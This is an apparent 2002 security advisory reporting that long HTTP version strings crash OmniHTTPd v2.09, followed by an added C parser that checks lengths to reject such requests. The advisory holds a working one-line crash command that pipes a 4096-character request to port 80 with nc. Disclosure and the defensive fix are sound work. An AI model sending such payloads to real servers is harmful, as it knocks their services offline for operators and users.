From: Martin J. Muench (mjm codito.de)
Date: Mon Jul 01 2002 - 13:27:18 CDT
Hi there.
The OmniHTTPd v2.09 of Omnicron (www.omnicron.ca) contains
a problem with handling long HTTP versions which causes a denial of
service.
Found this problem while developing a new plugin for BED (Bruteforce
Exploit Detector, www.kryptocrew.de/snakebyte/bed.html).
[ Problem
When sending a malformed request with an HTTP version containing 4096 or
more characters, the HTTPd crashes.
Example:
perl -e 'print "HEAD / "."a"x4096 ."\n\n"' | nc 127.0.0.1 80
This attack also works with every other request type, like 'GET', 'POST', ...
[ Patches
Nothing published yet, contacted vendor 2 weeks ago.
Keep looking at vendor site at www.omnicron.ca.
Martin J. Muench
- www.codito.de
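
Added example, not part of the original post and not OmniHTTPd code: a request-line parser that checks every length before copying, so the oversized HTTP version field described above is rejected instead of stored. The limits, type names and function names are assumptions chosen for this sketch.

```c
#include <stddef.h>
#include <string.h>

/* Assumed limits for this sketch; they are not OmniHTTPd values. */
#define MAX_REQUEST_LINE 2048
#define MAX_TOKEN        16   /* room for a method name or "HTTP/1.1" */

enum parse_status { REQ_OK, REQ_BAD, REQ_TOO_LONG };

struct request_line {
    char method[MAX_TOKEN];
    char version[MAX_TOKEN];
    size_t target_off, target_len;   /* target is referenced, not copied */
};

/* Length of the run of bytes up to the next space or the end of the line. */
static size_t token_len(const char *p, const char *end)
{
    const char *s = p;
    while (p < end && *p != ' ') p++;
    return (size_t)(p - s);
}

/* Parse "METHOD SP target SP HTTP/x.y" from buf[0..len). A server would read
 * more data on an incomplete short line; this sketch reports it as REQ_BAD. */
enum parse_status parse_request_line(const char *buf, size_t len, struct request_line *out)
{
    const char *eol = memchr(buf, '\n', len);
    if (!eol) return len > MAX_REQUEST_LINE ? REQ_TOO_LONG : REQ_BAD;
    if ((size_t)(eol - buf) > MAX_REQUEST_LINE) return REQ_TOO_LONG;
    if (eol > buf && eol[-1] == '\r') eol--;

    const char *p = buf;
    size_t n = token_len(p, eol);
    if (n == 0 || n >= MAX_TOKEN || p + n == eol) return REQ_BAD;
    memcpy(out->method, p, n); out->method[n] = '\0';
    p += n + 1;
    n = token_len(p, eol);
    if (n == 0 || p + n == eol) return REQ_BAD;   /* no version field present */
    out->target_off = (size_t)(p - buf); out->target_len = n;
    p += n + 1;

    n = (size_t)(eol - p);   /* the version is the rest of the line */
    if (n >= MAX_TOKEN) return REQ_TOO_LONG;       /* checked before any copy */
    if (n != 8 || memcmp(p, "HTTP/", 5) != 0 || p[6] != '.') return REQ_BAD;
    if (p[5] < '0' || p[5] > '9' || p[7] < '0' || p[7] > '9') return REQ_BAD;
    memcpy(out->version, p, n); out->version[n] = '\0';
    return REQ_OK;
}
```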